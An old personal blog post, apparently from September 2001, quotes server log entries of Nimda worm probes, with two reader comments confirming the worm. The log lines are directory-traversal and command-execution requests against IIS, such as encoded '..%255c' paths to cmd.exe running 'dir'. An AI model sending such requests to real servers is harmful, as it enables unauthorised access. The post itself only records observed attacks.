Hit or Miss

From my server logs:

"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

etc…

Is this the work of the Nimda virus? Thank goodness I run Linux.

2 responses so far (Respond)

Gravatar

Speaking as someone whose machine was trashed by the Nimda virus today… YES. Watch out, it’s a bastard.

Luckily it was just my work machine that got hit. Everything at home was sitting safe behind the firewall. We’ve been seeing similar things pop up in our logs. We’ve had about 300 scans run on it so far. Be vigilant.

Kris | 19 Sep 2001
Gravatar

Yep. Microsoft products suck, huh?

Charles | 19 Sep 2001